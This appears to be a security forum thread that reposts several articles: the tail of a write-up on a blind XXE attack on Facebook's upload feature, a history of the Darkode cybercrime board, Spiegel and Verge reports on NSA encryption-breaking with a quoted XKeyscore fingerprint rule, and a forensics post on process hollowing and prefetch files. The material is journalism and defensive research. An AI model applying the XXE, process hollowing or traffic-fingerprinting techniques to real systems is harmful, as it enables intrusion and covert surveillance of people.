on the parsing system file system (of course the attacker still needs a way to get these data back) DoS on other systems (if parsing system is allowed to establish TCP connections to other systems) NTLM authentication material theft by initiating UNC file access to systems under attacker control (far fetched?) Doomsday scenario: A widely deployed and highly connected application vulnerable to this attack may be used for DDoS. Directory Listing, Read system and application files and in some cases execute system commands using php expect:// wrapper. Aftermath He tried to gain access to system files on the server, but failed to get access , most probably due to security mechanisms in place. But he was confident that the attack he managed to pull off was a Blind XXE Out Of Band (OOB) plus it was a time-consuming process because he needed to upload and wait the result after 15 minutes or more. Without further ado , he informed the social network of his findings. His findings were rejected outright the first time, with the following words. He responded to the Facebook’s security team by sending them the forged CV to which FB got back with following reply : He still was not satisfied and continued corresponding with the Facebook Security team, which ultimately realised the vulnerability in its file upload mechanism. Bounty Received Facebook has acknowledged the vulnerability and according to its policy, rewarded Ramadan for his research. They fixed the vulnerability by adding this line of code: “ libxml_disable_entity_loader(true)“ Following is a PoC video Ramadan uploaded on YouTube to showcase the vulnerability in Facebook Resource : Attack Secure Sursa: Hacking Facebook using a forged Microsoft Word document
  19. Nytro
    [h=1]Darkode - Ode to LizardSquad (The Rise and Fall of a Private Community)[/h] For the 10 of you who don't know, darkode was on of the most active English-speaking "underground" cybercrime boards. The forum was started around 2009 by a coder named "Iserdo" and gained popularity off the back of Iserdo's bot, "Buterfly bot" (AKA Mariposa), which was sold there. [h=2]In The Beginning[/h] With Iserdo as admin, the main focus of darkode was selling and supporting his products; however, the success of butterfly bot lead to a rapid growth in user-base and quickly darkode became a popular malware marketplace, much sought after by English-speaking cybercriminals. As a result of growing popularity, the forum was turned invite-only and existing members were given a number of invites, which they could give out to whomever they chose. Of course the invite-only model just made membership more sought after and gained darkode a reputation as an elite underground forum. At some point around 2010, Iserdo left and the forum was handed over to Crim (the coder of CrimePack which was one of the early exploit kits), who also gave admin to fubar (the seller of the infamous NgrBot). [h=2]Access Refines[/h] In march 2012 a new access model was announced, the community became layered with "fresh fish" (level 0) as the basic membership, and "Level 1" (Trusted) as the upgraded membership. For fresh fish access, an applicant would need to be invited by another member, followed by completing an interview with an admin, In order to get level 1 access, existing members would need to prove themselves to the community and if given access, would be able to view/use the level 1 marketplace, which featured more exclusive products. There was also a special "Buyer" level created, which would only allow the user access to the marketplace and not the discussion or coding sections. Eventually access was further refined to disallow level 0 users from inviting people, and a level 2 section was created for highly trusted users (and was rumored to allow fraud, which was previously disallowed on the forum). [h=2]The Great Researcher War[/h] With darkode as a cybercrime hotspot, it's not really a huge surprise that people working in the security industry gained interest in getting access. Researchers such as Xylitol and Brian Krebs dedicated a big part of their blogs to having the inside scoop on darkode, and although admins were very proactive in seeking out and banning security researchers; there was always another hacker to pay off or account to hijack, resulting in numerous threads hating on researcher and Brian Krebs becoming a meme. The forum began taking more an more precautions to root out security researcher, including mass demoting accounts, banning people who were unknown to them, embedding metadata to identify accounts used to post screenshots, even targeting the researchers directly (see here), all to no avail. Members were already getting edgy about posting with so many security researchers on the site, but it wasn't until sp3cial1st was voted for admin in 2013 that the final nail was driven into the darkode coffin. sp3cial1st's approach to researchers was proactive with a touch of paranoia, it started with banning their accounts, then banning the people who invited them, even banning the people who vouched for them, which caused members to stop inviting for fear of getting banned, of course the researchers still found a way back. With the new incredibly proactive anti-researcher strategy, researchers like Krebs would tease the admins with proof of their continued or re-gained access to the site, resulting in frequent pre-preemptive bans of just about any account that seemed remotely whitehat, I even personally witnessed legitimate cybercriminals getting banned for "being Brian Krebs". Before long, the only people on darkode were the admins, undercover FBI agents, security researchers, and a few highly trusted members. [h=2]Re-population Attempts[/h] With darkode on life support and still teaming with security researchers, the admin desperately tried to breath new life into the site. After giving out vast numbers of invite codes to the existing member failed, sp3cia1ist started posting threads on hackforums (a scriptkiddie hacking fourm), in order to obtain some interest, when that wasn't enough, he resulted to sending out spam messages embedded with darkode invites to mailing lists that'd been acquired from old hacking forums (this obviously made even the die-hard darkode members doubt their "prestigious" position). [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]darkode recruitment email[/TD] [/TR] [/TABLE] It was quite clear that darkode had had its day, but it just didn't stop there. The admin setup a public IRC server under irc.darkode.com where people could come to beg for invites, started posting replies to threads on any forum that made mention of darkode or private forums, even posting comments to entice people in the comment section of krebsonsecurity.com. [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Sp3cial1st' advertising on hackforums[/TD] [/TR] [/TABLE] [h=2]Lizard Squad[/h] Even I can't explain how darkode got form where it was to here, but we can assume it was for publicity. Around the time LizardSquad became well known by DDoSing just about anything and everything, they decided to follow the same route as lulzsec(setting up a public IRC channel on freenode), unfortunately freenode was having none of this and and banned them, along with everyone in their channel, a few days later. The same week, LizardSquad had relocated to the darkode IRC, which the darkode admin appears to be fine with, he even allowed LizardSquad to spam the darkode url all-over the internet, something that was previously forbidden. Of course, sharing an IRC only implies the darkode admin tolerated LizardSquad but may not have worked with them. I had noticed that lizardpatrol.com (the official LizardSquad website) was hidden behind cloudflare, so on a hunch I send a HTTP request to the darkode server, with the hostname set to "lizardpatrol.com", and what would you know! That's right, the darkode server is also hosting the official LizardSquad website, oh dear. Sursa: Darkode - Ode to LizardSquad (The Rise and Fall of a Private Community) | MalwareTech
  20. Nytro
    Pentru cei care stiu despre ce e vorba. Download: http://mis.fortunecook.ie/too-many-cooks-exploiting-tr069_tal-oppenheim_31c3.pdf
  21. Nytro
    OTP VPN exploitation team Download: http://www.spiegel.de/media/media-35515.pdf Authors: NSA
  22. Nytro
    Prying Eyes: Inside the NSA's War on Internet Security By SPIEGEL Staff DPA/ NSA The NSA's headquarters in Fort Meade, Maryland: The US foreign intelligence agency views all encrypted communications as a "threat" to its operations. US and British intelligence agencies undertake every effort imaginable to crack all types of encrypted Internet communication. The cloud, it seems, is full of holes. The good news: New Snowden documents show that some forms of encryption still cause problems for the NSA. When Christmas approaches, the spies of the Five Eyes intelligence services can look forward to a break from the arduous daily work of spying. In addition to their usual job -- attempting to crack encryption all around the world -- they play a game called the "Kryptos Kristmas Kwiz," which involves solving challenging numerical and alphabetical puzzles. The proud winners of the competition are awarded "Kryptos" mugs. Encryption -- the use of mathematics to protect communications from spying -- is used for electronic transactions of all types, by governments, firms and private users alike. But a look into the archive of whistleblower Edward Snowden shows that not all encryption technologies live up to what they promise. One example is the encryption featured in Skype, a program used by some 300 million users to conduct Internet video chat that is touted as secure. It isn't really. "Sustained Skype collection began in Feb 2011," reads a National Security Agency (NSA) training document from the archive of whistleblower Edward Snowden. Less than half a year later, in the fall, the code crackers declared their mission accomplished. Since then, data from Skype has been accessible to the NSA's snoops. Software giant Microsoft, which acquired Skype in 2011, said in a statement: "We will not provide governments with direct or unfettered access to customer data or encryption keys." The NSA had been monitoring Skype even before that, but since February 2011, the service has been under order from the secret US Foreign Intelligence Surveillance Court (FISC), to not only supply information to the NSA but also to make itself accessible as a source of data for the agency. The "sustained Skype collection" is a further step taken by the authority in the arms race between intelligence agencies seeking to deny users of their privacy and those wanting to ensure they are protected. There have also been some victories for privacy, with certain encryption systems proving to be so robust they have been tried and true standards for more than 20 years. For the NSA, encrypted communication -- or what all other Internet users would call secure communication -- is "a threat". In one internal training document viewed by SPIEGEL, an NSA employee asks: "Did you know that ubiquitous encryption on the Internet is a major threat to NSA's ability to prosecute digital-network intelligence (DNI) traffic or defeat adversary malware?" Snipped from NSA document: Encryption considered a "threat" The Snowden documents reveal the encryption programs the NSA has succeeded in cracking, but, importantly, also the ones that are still likely to be secure. Although the documents are around two years old, experts consider it unlikely the agency's digital spies have made much progress in cracking these technologies. "Properly implemented strong crypto systems are one of the few things that you can rely on," Snowden said in June 2013, after fleeing to Hong Kong. The digitization of society in the past several decades has been accompanied by the broad deployment of cryptography, which is no longer the exclusive realm of secret agents. Whether a person is conducting online banking, Internet shopping or making a phone call, almost every Internet connection today is encrypted in some way. The entire realm of cloud computing -- that is of outsourcing computing tasks to data centers somewhere else, possibly even on the other side of the globe -- relies heavily on cryptographic security systems. Internet activists even hold crypto parties where they teach people who are interested in communicating securely and privately how to encrypt their data. German officials suggest "consistent encryption" In Germany, concern about the need for strong encryption goes right up to the highest levels of the government. Chancellor Angela Merkel and her cabinet now communicate using phones incorporating strong encryption. The government has also encouraged members of the German public to take steps to protect their own communication. Michael Hange, the president of the Federal Office for Information Security, has stated: "We suggest cryptography -- that is, consistent encryption." It's a suggestion unlikely to please some intelligence agencies. After all, the Five Eyes alliance -- the secret services of Britain, Canada, Australia, New Zealand and the United States -- pursue a clear goal: removing the encryption of others on the Internet wherever possible. In 2013, the NSA had a budget of more than $10 billion. According to the US intelligence budget for 2013, the money allocated for the NSA department called Cryptanalysis and Exploitation Services (CES) alone was $34.3 million. Last year, the Guardian, New York Times and ProPublica reported on the contents of a 2010 presentation on the NSA's BULLRUN decryption program, but left out many specific vulnerabilities. The presentation states that, "for the past decade, NSA has led an aggressive, multipronged effort to break widely used Internet encryption technologies," and "vast amounts of encrypted Internet data which have up till now been discarded are now exploitable." Decryption, it turns out, works retroactively - once a system is broken, the agencies can look back in time in their databases and read stuff they could not read before. The number of Internet users concerned about privacy online has risen dramatically since the first Snowden revelations. But people who consciously use strong end-to-end encryption to protect their data still represent a minority of the Internet-using population. There are a number of reasons for this: Some believe encryption is too complicated to use. Or they think the intelligence agency experts are already so many steps ahead of them that they can crack any encryption program. Still Safe from the NSA This isn't true. As one document from the Snowden archive shows, the NSA had been unsuccessful in attempts to decrypt several communications protocols, at least as of 2012. An NSA presentation for a conference that took place that year lists the encryption programs the Attacks against Crypto Guide for Analysts on how to use the PRISM Skype Collection GCHQ Briefing on the BULLRUN Program GCHQ Presentation on the BULLRUN Programs Decryption Capabilities NSA LONGHAUL program for end-to-end attack orchestration and key recovery service BLUESNORT program on "Net Defense" from Encrypted Communications Presentation from the SIGDEV Conference 2012 explaining which encryption protocols and techniques can be attacked and which not NSA program SCARLETFEVER explaining how attacks on encrypted connections are orchestrated Description of VOIP Telephony Encryption methods and cryptanalytic and other ways to attack Americans failed to crack. In the process, the NSA cryptologists divided their targets into five levels corresponding to the degree of the difficulty of the attack and the outcome, ranging from "trivial" to "catastrophic." Monitoring a document's path through the Internet is classified as "trivial." Recording Facebook chats is considered a "minor" task, while the level of difficulty involved in decrypting emails sent through Moscow-based Internet service provider "mail.ru" is considered "moderate." Still, all three of those classifications don't appear to pose any significant problems for the NSA. Things first become troublesome at the fourth level. The presentation states that the NSA encounters "major" problems in its attempts to decrypt messages sent through heavily encrypted email service providers like Zoho or in monitoring users of the Tor network*, which was developed for surfing the web anonymously. Tor, otherwise known as The Onion Router, is free and open source software that allows users to surf the web through a network of more than 6,000 linked volunteer computers. The software automatically encrypts data in a way that ensures that no single computer in the network has all of a user's information. For surveillance experts, it becomes very difficult to trace the whereabouts of a person who visits a particular website or to attack a specific person while they are using Tor to surf the Web. Cryptanalytics General Description how NSA handles encrypted traffic Intercept with PGP encrypted message Classification Guide for Cryptanalysis Procedural GCHQ Document on how analysts are to handle encrypted traffic NSA / GCHQ Crypt Discovery Joint Collaboration Activity NSA Cryptographic Modernization (CryptoMod) Classification Guide "National Information Assurance Research Laboratory (NIARL)": Newsletter, Keyword TUNDRA What Your Mother Never Told You About the development of Signal Intelligence Intercept with OTR encrypted chat The NSA also has "major" problems with Truecrypt, a program for encrypting files on computers. Truecrypt's developers stopped their work on the program last May, prompting speculation about pressures from government agencies. A protocol called Off-the-Record (OTR) for encrypting instant messaging in an end-to-end encryption process also seems to cause the NSA major problems. Both are programs whose source code can be viewed, modified, shared and used by anyone. Experts agree it is far more difficult for intelligence agencies to manipulate open source software programs than many of the closed systems developed by companies like Apple and Microsoft. Since anyone can view free and open source software, it becomes difficult to insert secret back doors without it being noticed. Transcripts of intercepted chats using OTR encryption handed over to the intelligence agency by a partner in Prism -- an NSA program that accesses data from at least nine American internet companies such as Google, Facebook and Apple -- show that the NSA's efforts appear to have been thwarted in these cases: "No decrypt available for this OTR message." This shows that OTR at least sometimes makes communications impossible to read for the NSA. Things become "catastrophic" for the NSA at level five - when, for example, a subject uses a combination of Tor, another anonymization service, the instant messaging system CSpace and a system for Internet telephony (voice over IP) called ZRTP. This type of combination results in a "near-total loss/lack of insight to target communications, presence," the NSA document states. ZRTP, which is used to securely encrypt conversations and text chats on mobile phones, is used in free and open source programs like RedPhone and Signal. "It's satisfying to know that the NSA considers encrypted communication from our apps to be truly opaque," says RedPhone developer Moxie Marlinspike. Too Robust for Fort Meade Also, the "Z" in ZRTP stands for one of its developers, Phil Zimmermann, the same man who created Pretty Good Privacy, which is still the most common encryption program for emails and documents in use today. PGP is more than 20 years old, but apparently it remains too robust for the NSA spies to crack. "No decrypt available for this PGP encrypted message," a further document viewed by SPIEGEL states of emails the NSA obtained from Yahoo. Phil Zimmermann wrote PGP in 1991. The American nuclear weapons freeze activist wanted to create an encryption program that would enable him to securely exchange information with other like-minded individuals. His system quickly became very popular among dissidents around the world. Given its use outside the United States, the US government launched an investigation into Zimmermann during the 1990s for allegedly violating the Arms Export Control Act. Prosecutors argued that making encryption software of such complexity available abroad was illegal. Zimmermann responded by publishing the source code as a book, an act that was constitutionally protected as free speech. PGP continues to be developed and various versions are available today. The most widely used is GNU Privacy Guard (GnuPG), a program developed by German programmer Werner Koch. One document shows that the Five Eyes intelligence services sometimes use PGP themselves. The fact is that hackers obsessed with privacy and the US authorities have a lot more in common than one might initially believe. The Tor Project*, was originally developed with the support of the US Naval Research Laboratory. Deanonymizing Explanation of a potential technique to deanonymise users of the TOR network Analytics on security of TOR hidden services Overview on Internet Anonymization Services on how they work TOR deanonymisation research TOR Overview of Existing Techniques A potential technique to deanonymise users of the TOR network Today, NSA spies and their allies do their best to subvert the system their own military helped conceive, as a number of documents show. Tor deanonymization is obviously high on the list of NSA priorities, but the success achieved here seems limited. One GCHQ document from 2011 even mentions trying to decrypt the agencies' own use of Tor -- as a test case. To a certain extent, the Snowden documents should provide some level of relief to people who thought nothing could stop the NSA in its unquenchable thirst to collect data. It appears secure channels still exist for communication. Nevertheless, the documents also underscore just how far the intelligence agencies already go in their digital surveillance activities. Internet security comes at various levels -- and the NSA and its allies obviously are able to "exploit" -- i.e. crack -- several of the most widely used ones on a scale that was previously unimaginable. VPN Security only Virtual One example is virtual private networks (VPN), which are often used by companies and institutions operating from multiple offices and locations. A VPN theoretically creates a secure tunnel between two points on the Internet. All data is channeled through that tunnel, protected by cryptography. When it comes to the level of privacy offered here, virtual is the right word, too. This is because the NSA operates a large-scale VPN exploitation project to crack large numbers of connections, allowing it to intercept the data exchanged inside the VPN -- including, for example, the Greek government's use of VPNs. The team responsible for the exploitation of those Greek VPN communications consisted of 12 people, according to an NSA document SPIEGEL has seen. Attacks on VPN NSA High Level Description on TURMOIL / APEX Programs on Attacking VPN Explanation of the GALLANTWAVE that decrypts VPN Traffic within LONGHAUL Intro to the VPN Exploitation Process mentioning the protocols attacked - PPTP, IPSEC, SSL, SSH) Analytic Challenges from Active-Passive Integration when NSA attacks IPSEC VPNs Overview of the capabilities of the VALIANTSURF program MALIBU Architecture Overview to exploit VPN Communication POISENNUT Virtual Private Network Attack Orchestrator (VAO) NSA Presentation on the development of Attacks on VPN NSA Presentation on the Analysis and Contextualisation of data from VPN Description of existing projects on VPN decryption Explanation of the Transform Engine Emulator when attacking VPN Explanation of the POISENNUT Product and its role when attacking VPN Explanation of the TURMOIL GALLANTWAVE Program and its role when attacking VPN Processing of data from exploited VPN in the TURMOIL program Decryption of VPN Connections within the VALIANTSURF program Description on the processing of VPN data packets within the TURMOIL program Explanation on the SPIN9 program on end-to-end attacks on VPN The NSA also targeted SecurityKiss, a VPN service in Ireland. The following fingerprint for Xkeyscore, the agency's powerful spying tool, was reported to be tested and working against the service: fingerprint('encryption/securitykiss/x509') = $pkcs and ( ($tcp and from_port(443)) or ($udp and (from_port(123) or from_por (5000) or from_port(5353)) ) ) and (not (ip_subnet('10.0.0.0/8' or '172.16.0.0/12' or '192.168.0.0/16' )) ) and 'RSA Generated Server Certificate'c and 'Dublin1'c and 'GL CA'c; According to an NSA document dating from late 2009, the agency was processing 1,000 requests an hour to decrypt VPN connections. This number was expected to increase to 100,000 per hour by the end of 2011. The aim was for the system to be able to completely process "at least 20 percent" of these requests, meaning the data traffic would have to be decrypted and reinjected. In other words, by the end of 2011, the NSA's plans called for simultaneously surveilling 20,000 supposedly secure VPN communications per hour. VPN connections can be based on a number of different protocols. The most widely used ones are called Point-to-Point Tunneling Protocol (PPTP) and Internet Protocol Security (Ipsec). Both seem to pose few problems for the NSA spies if they really want to crack a connection. Experts have considered PPTP insecure for some time now, but it is still in use in many commercial systems. The authors of one NSA presentation boast of a project called FOURSCORE that stores information including decrypted PPTP VPN metadata. Using a number of different programs, they claim to have succeeded in penetrating numerous networks. Among those surveilled were the Russian carrier Transaero Airlines, Royal Jordanian Airlines as well as Moscow-based telecommunications firm Mir Telematiki. Another success touted is the NSA's surveillance of the internal communications of diplomats and government officials from Afghanistan, Pakistan and Turkey. Ipsec as a protocol seems to create slightly more trouble for the spies. But the NSA has the resources to actively attack routers involved in the communication process to get to the keys to unlock the encryption rather than trying to break it, courtesy of the unit called Tailored Access Operations: "TAO got on the router through which banking traffic of interest flows," it says in one presentation. Anything But Secure Even more vulnerable than VPN systems are the supposedly secure connections ordinary Internet users must rely on all the time for Web applications like financial services, e-commerce or accessing webmail accounts. A lay user can recognize these allegedly secure connections by looking at the address bar in his or her Web browser: With these connections, the first letters of the address there are not just http -- for Hypertext Transfer Protocol -- but https. The "s" stands for "secure". The problem is that there isn't really anything secure about them. Attacks on SSL/TLS NSA Experiment for massive SSL/TLS Decryption Canadian Document from CES on TLS Trends Details on how NSA uses the SCARLETFEVER program to attack Scure Sockets Layer (SSL)/Transport Layer Scurity (TLS) Analysis from SSL/TLS Connections through GCHQ in the flying pig database The NSA and its allies routinely intercept such connections -- by the millions. According to an NSA document, the agency intended to crack 10 million intercepted https connections a day by late 2012. The intelligence services are particularly interested in the moment when a user types his or her password. By the end of 2012, the system was supposed to be able to "detect the presence of at least 100 password based encryption applications" in each instance some 20,000 times a month. For its part, Britain's GCHQ collects information about encryption using the TLS and SSL protocols -- the protocols https connections are encrypted with -- in a database called "FLYING PIG." The British spies produce weekly "trends reports" to catalog which services use the most SSL connections and save details about those connections. Sites like Facebook, Twitter, Hotmail, Yahoo and Apple's iCloud service top the charts, and the number of catalogued SSL connections for one week is in the many billions -- for the top 40 sites alone. Hockey sites monitored Canada's Communications Security Establishment (CSEC) even monitors sites devoted to the country's national pastime: "We have noticed a large increase in chat activity on the hockeytalk sites. This is likely due to the beginning of playoff season," it says in one presentation. The NSA also has a program with which it claims it can sometimes decrypt the Secure Shell protocol (SSH). This is typically used by systems administrators to log into employees' computers remotely, largely for use in the infrastructure of businesses, core Internet routers and other similarly important systems. The NSA combines the data collected in this manner with other information to leverage access to important systems of interest. Weakening Cryptographic Standards But how do the Five-Eyes agencies manage to break all these encryption standards and systems? The short answer is: They use every means available. One method is consciously weakening the cryptographic standards that are used to implement the respective systems. Documents seen by SPIEGEL show that NSA agents travel to the meetings of the Internet Engineering Task Force (IETF), an organization that develops such standards, to gather information but presumably also to influence the discussions there. "New session policy extensions may improve our ability to passively target two sided communications," says a brief write-up of an IETF meeting in San Diego on an NSA-internal Wiki. This process of weakening encryption standards has been going on for some time. A classification guide, a document that explains how to classify certain types of secret information, labels "the fact that NSA/CSS makes cryptographic modifications to commercial or indigenous cryptographic information security devices or systems in order to make them exploitable" as Top Secret. NSA classification guide: "Cryptographic modifications" Cryptographic systems actively weakened this way or faulty to begin with are then exploited using supercomputers. The NSA maintains a system called Longhaul, an "end-to-end attack orchestration and key recovery service for Data Network Cipher and Data Network Session Cipher traffic." Basically, Longhaul is the place where the NSA looks for ways to break encryption. According to an NSA document, it uses facilities at the Tordella Supercomputer Building at Fort Meade, Maryland, and Oak Ridge Data Center in Oak Ridge, Tennessee. It can pass decrypted data to systems such as Turmoil -- a part of the secret network the NSA operates throughout the world, used to siphon off data. The cover term for the development of these capabilities is Valientsurf. A similar program called Gallantwave is meant to "break tunnel and session ciphers." In other cases, the spies use their infrastructure to steal cryptographic keys from the configuration files found on Internet routers. A repository called Discoroute contains "router configuration data from passive and active collection" one document states. Active here means hacking or otherwise infiltrating computers, passive refers to collecting data flowing through the Internet with secret NSA-operated computers. An important part of the Five Eyes' efforts to break encryption on the Internet is the gathering of vast amounts of data. For example, they collect so-called SSL handshakes -- that is, the first exchanges between two computers beginning an SSL connection. A combination of metadata about the connections and metadata from the encryption protocols then help to break the keys which in turn allow reading or recording the now decrypted traffic. If all else fails, the NSA and its allies resort to brute force: They hack their target's computers or Internet routers to get to the secret encryption -- or they intercept computers on the way to their targets, open them and insert spy gear before they even reach their destination, a process they call interdiction. A Grave Threat to Security For the NSA, the breaking of encryption methods represents a constant conflict of interest. The agency and its allies do have their own secret encryption methods for internal use. But the NSA is also tasked with providing the US National Institute of Standards and Technology (NIST) with "technical guidelines in trusted technology" that may be "used in cost-effective systems for protecting sensitive computer data." In other words: Checking cryptographic systems for their value is part of the NSA's job. One encryption standard the NIST explicitly recommends is the Advanced Encryption Standard (AES). The standard is used for a large variety of tasks, from encrypting the PIN numbers of banking cards to hard disk encryption for computers. One NSA document shows that the agency is actively looking for ways to break the very standard it recommends - this section is marked as "Top Secret" (TS): "Electronic codebooks, such as the Advanced Encryption Standard, are both widely used and difficult to attack cryptanalytically. The NSA has only a handful of in-house techniques. The TUNDRA project investigated a potentially new technique -- the Tau statistic -- to determine its usefulness in codebook analysis." The fact that large amounts of the cryptographic systems that underpin the entire Internet have been intentionally weakened or broken by the NSA and its allies poses a grave threat to the security of everyone who relies on the Internet -- from individuals looking for privacy to institutions and companies relying on cloud computing. Many of these weaknesses can be exploited by anyone who knows about them -- not just the NSA. Inside the intelligence community, this danger is widely known: According to a 2011 document, 832 individuals at GCHQ alone were briefed into the BULLRUN project, whose goal is a large-scale assault on Internet security. By Jacob Appelbaum, Aaron Gibson, Christian Grothoff, Andy Müller-Maguhn, Laura Poitras, Michael Sontheimer and Christian Stöcker * Two co-authors of this article, Jacob Appelbaum and Aaron Gibson, work on the Tor-Project. Appelbaum also works on the OTR project, as well as contributing to other encryption programs. Sursa: Inside the NSA's War on Internet Security - SPIEGEL ONLINE
  23. Nytro
    New documents reveal which encryption tools the NSA couldn't crack By Russell Brandom on December 28, 2014 06:23 pm Email @russellbrandom Thanks to Edward Snowden, we're getting a new look at which programs can successfully keep out the NSA. A report in Der Spiegel has shed new light on the NSA's encryption-breaking programs, and put a spotlight on the handful of programs that are still giving them trouble. The findings, based on leaked documents, were also presented onstage at the Chaos Computer Club Conference in Hamburg by researcher Jacob Appelbaum and Laura Poitras, who took the findings as a call to action. "We really wanted to have some of these answers for fifteen years," Appelbaum told the crowd. The reports describe "major problems" following users across the Tor network The most impressive news to come out of the dump is that, as of 2012, certain emails and chats were still indecipherable by the NSA database when they had been encrypted with the right tools. Reports describe "major problems" following users across the Tor network, or deciphering messages sent through heavily encrypted email providers like Zoho. The agency reported similar problems when deciphering files that had been encrypted with TrueCrypt, an open-source disk-encryption program that was discontinued earlier this year. PGP encryption tools and OTR chat encryption also caused major problems for the agency, causing entire messages to disappear from the system, leaving only the message: "No decrypt available for this PGP encrypted message." "No decrypt available for this PGP encrypted message." Not every service fared so well. Following a particular file across the web is marked as "trivial," while decrypting emails sent through the Russian mail service "Mail.ru" is marked as "moderate." Virtual private networks also offer little protection: documents show the NSA planning the capacity to surveil 20,000 VPN connections per hour. Perhaps most alarming, the NSA seems to have completely circumvented the HTTPS system, which is used to secure connections between websites and browsers. By late 2012, the agency expected to be able to intercept 10 million HTTPS connections per day. This also doesn't mean PGP and Tor users are completely inaccessible. Law enforcement has performed successful attacks on Tor using a variety of tactics, and even the most impressive encryption tool can't get around a local malware infection. The age of the documents has also raised concerns: documents from 2012 show the NSA struggling to crack the AES encryption standard — one of the most widely used standards in cryptography — and some observers are worried that the NSA's efforts may have succeeded in the two years since. For security experts, the result is a mixed bag. Many of the cracked standards were already known to be faulty, so the news of widespread HTTPS circumvention is alarming, but not entirely surprising. At the same time, anyone depending on PG or Tor to throw off surveillance should be relieved to find evidence that the tools have often succeeded in doing just that. But for Appelbaum, the broader lesson was the ongoing fight between government surveillance and private communications. "During the crypto wars, we thought that we had won.... We thought that with cryptography we could change the entire balance," Appelbaum said. "We can say now that the first crypto wars were not won. If anything they were lost, or they're still going on now." Sursa: New documents reveal which encryption tools the NSA couldn't crack | The Verge
  24. Nytro
    [h=2]Prefetch File Meet Process Hollowing[/h] Wednesday, December 17, 2014 Posted by Corey Harrell There are times when you are doing research and you notice certain behavior. You may had been aware about the behavior but you never consider the impact it has on other artifacts we depend on during our digital forensic and incident response examinations. After thinking about and researching the behavior and impact, it makes complete sense; so much so it's pretty obvious after the fact. In this post I'm exploring one such behavior and its impact I came across researching systems impacted by the Poweliks fileless malware. Specifically, how creating a suspended process and injecting code into it impacts the process's prefetch file. The statement below is the short version describing the impact injecting code into a suspended process has on its prefetch file. For those wanting the details behind it the rest of the post explains it. If the CreateProcess function creates a process in the suspended state and code gets injected into the process. The prefetch file for that process will contain the trace for the injected code and not the original process. Therefore, the prefetch file can be an indicator showing this technique was used. [h=2]Process Hollowing Technique[/h] Malware uses various techniques to covertly execute code on systems. One such technique is process hollowing, which is also known as process replacement. The book Practical Malware Analysis states the following in regards to this technique: "Process replacement is used when a malware author wants to disguise malware as a legitimate process, without the risk of crashing a process through the use of process injection. Key to process replacement is creating a process in a suspended state. This means that the process will be loaded into memory, but the primary thread of the process is suspended. The program will not do anything until an external program resumes the primary thread, causing the program to start running" In addition, the book The Art of Memory Forensics states the following: "A malicious process starts a new instance of a legitimate process (such as lsass.exe) in suspended mode. Before resuming it, the executable section( s) are freed and reallocated with malicious code." In essence, process hollowing is when a process is started in the suspended state, code is injected into the process to overwrite the original data, and when the process is resumed the injected code is executed. In a future post I will go into greater detail about this technique but for this post I wanted to keep the description at a high level. [h=2]Windows Internals Information[/h] To fully explore the process hollowing behavior on a Windows system and its impact on the prefetch file it is necessary to understand Windows internals. Specifically, when and why prefetch files are created and how processes are created. [h=3]Windows Prefetcher Information[/h] Prefetch files are a well known and understood artifact within the DFIR field. These files are a byproduct of the Windows operating system trying to speed up either the boot process or applications startup. The book Windows Internals, Part 2: Covering Windows Server 2008 R2 and Windows 7 states the following: "The prefetcher tries to speed the boot process and application startup by monitoring the data and code accessed by boot and application startups and using that information at the beginning of a subsequent boot or application startup to read in the code and data." As it relates to application prefetch files the book continues by saying: "The prefetcher monitors the first 10 seconds of application startup." The information the prefetcher monitors is explained as follows: "The trace assembled in the kernel notes faults taken on the NTFS master file table (MFT) metadata file (if the application accesses files or directories on NTFS volumes), on referenced files, and on referenced directories." In essence, if the prefetcher is enabled on a Windows systems then the first 10 seconds of execution is monitored to determine what files and directories the application accesses. This information (or trace) is then recorded in a prefetch file located inside the C:\Windows\Prefetch directory. [h=3]Windows Flow of Process Creation[/h] Knowing about process hollowing and prefetching is not enough. It's necessary to understand the flow of process creation in order to see the various activities that occur when a process is created. The book Windows Internals, Part 1: Covering Windows Server 2008 R2 and Windows 7 goes into great detail about process creation and below are the main stages: 1. Validate parameters; convert Windows subsystem flags and options to their native counterparts; parse, validate, and convert the attribute list to its native counterpart. 2. Open the image file (. exe) to be executed inside the process. 3. Create the Windows executive process object. 4. Create the initial thread (stack, context, and Windows executive thread object). 5. Perform post-creation, Windows-subsystem-specific process initialization. 6. Start execution of the initial thread (unless the CREATE_ SUSPENDED flag was specified). 7. In the context of the new process and thread, complete the initialization of the address space (such as load required DLLs) and begin execution of the program. The picture below illustrates the process creation main stages: The main stages highlight a very important point as it relates to process hollowing. When the a process is created it doesn't start executing until Stage 7. If the process is created in a suspended state then the first 6 stages are completed. The question is when does the prefetcher come into play. The book Windows Internals Part 1 states the following activity occurs in stage 7: "Otherwise, the routine checks whether application prefetching is enabled on the system and, if so, calls the prefetcher (and Superfetch) to process the prefetch instruction file (if it exists) and prefetch pages referenced during the first 10 seconds the last time the process ran." This is very important so it is worth repeating. The prefetcher monitoring application startup occurs in stage 7 when the application is executing. However, a process that is created in the suspended state does not execute until it is resumed. This means if the process hollowing technique is used then when the process resumes and executes the injected code the prefetcher is monitoring the files/directories accessed by the injected code and not the original process. In shorter words: If the CreateProcess function creates a process in the suspended state and code gets injected into the process. The prefetch file for that process will contain the trace for the injected code and not the original process. Therefore, the prefetch file can be an indicator showing this technique was used. [h=2]Process Hollowing Prefetch File[/h] It's always helpful to see what is being described in actual data to make it easier to how it applies to our examinations. To generate a prefetch file I double-clicked the svchost.exe executable located in the C:\Windows\Prefetch directory. Below is the partial output from this prefetch file being parsed with Harlan Carvey's pref.pl script in the WFA 4th edition book materials. (One note about the prefetch file; I added the underscore at the end to force the creation of a new prefetch file.) File : C:\Prefetch\SVCHOST_.EXE-3530F672.pf Exe Path : \DEVICE\HARDDISKVOLUME1\WINDOWS\SYSTEM32\SVCHOST.EXE Last Run : Wed Dec 17 20:58:57 2014 Run Count: 1 Module paths: \DEVICE\HARDDISKVOLUME1\WINDOWS\SYSTEM32\NTDLL.DLL \DEVICE\HARDDISKVOLUME1\WINDOWS\SYSTEM32\KERNEL32.DLL \DEVICE\HARDDISKVOLUME1\WINDOWS\SYSTEM32\UNICODE.NLS \DEVICE\HARDDISKVOLUME1\WINDOWS\SYSTEM32\LOCALE.NLS As shown above, the svchost.exe executed one time and some of the files accessed are reflected in the module paths section. I asked Harlan about where the executable path comes from in prefetch parsers since the prefetch file format does not record the executable path. He confirmed what I was assuming. Prefetch parsers search the module paths for the name of the executable referenced 